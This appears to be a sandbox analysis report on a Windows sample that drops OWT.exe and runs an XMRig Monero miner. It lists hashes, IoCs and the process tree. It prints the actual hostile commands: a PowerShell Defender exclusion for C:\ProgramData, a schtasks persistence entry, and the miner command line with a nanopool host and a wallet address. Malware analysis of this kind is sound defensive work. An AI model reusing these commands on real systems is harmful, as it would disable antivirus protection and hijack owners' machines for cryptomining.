Resubmissions
26-11-2022 08:19
221126-j7yhtaed66 1025-11-2022 12:27
221125-pmxnnsbe8t 824-11-2022 09:51
221124-lvp21seh53 1024-11-2022 09:44
221124-lqgvvahf3x 10Analysis
-
max time kernel
136s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 09:44
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
073a3dc0c60492b618f888c5e603fd05
-
SHA1
4de52c57f8f032724452e901120bcf0fbee52902
-
SHA256
f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
-
SHA512
4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
SSDEEP
24576:W+wHtwQBTvwpeNrT2i8k57TujjVx3KClNyOiY:W+sBTopej8Mw3NlNF
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3956-184-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3956-185-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/3956-186-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3956-187-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3956-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3956-192-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 3044 OWT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OWT.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OWT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 3044 set thread context of 3956 3044 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3504 timeout.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exepid process 2364 file.exe 2364 file.exe 4792 powershell.exe 4792 powershell.exe 3044 OWT.exe 3044 OWT.exe 3912 powershell.exe 3912 powershell.exe 3044 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 2364 file.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 3044 OWT.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeLockMemoryPrivilege 3956 vbc.exe Token: SeLockMemoryPrivilege 3956 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 3956 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 2364 wrote to memory of 4792 2364 file.exe powershell.exe PID 2364 wrote to memory of 4792 2364 file.exe powershell.exe PID 2364 wrote to memory of 1444 2364 file.exe cmd.exe PID 2364 wrote to memory of 1444 2364 file.exe cmd.exe PID 1444 wrote to memory of 3504 1444 cmd.exe timeout.exe PID 1444 wrote to memory of 3504 1444 cmd.exe timeout.exe PID 1444 wrote to memory of 3044 1444 cmd.exe OWT.exe PID 1444 wrote to memory of 3044 1444 cmd.exe OWT.exe PID 3044 wrote to memory of 3912 3044 OWT.exe powershell.exe PID 3044 wrote to memory of 3912 3044 OWT.exe powershell.exe PID 3044 wrote to memory of 1276 3044 OWT.exe cmd.exe PID 3044 wrote to memory of 1276 3044 OWT.exe cmd.exe PID 1276 wrote to memory of 3672 1276 cmd.exe schtasks.exe PID 1276 wrote to memory of 3672 1276 cmd.exe schtasks.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe PID 3044 wrote to memory of 3956 3044 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE340.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3504
-
-
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:3672
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3956
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
138B
MD5241d3b0401da29531e54086e32a52107
SHA1ae42f8baa3e8fe1bd0cd1448f0bf7a13b6e314ce
SHA2560a2d8b3733b48c37dede0c67b78976d5d8783bcbd41cc87d737b80252ec26793
SHA5120e4d6bf1c622424c393c7aa71754b47d7ea2acf2eef09df3de1d3b08615d6586f99d8730aa789ad460ed68247b8e81ed3cb0de70e82566f9ea1d02944250a96e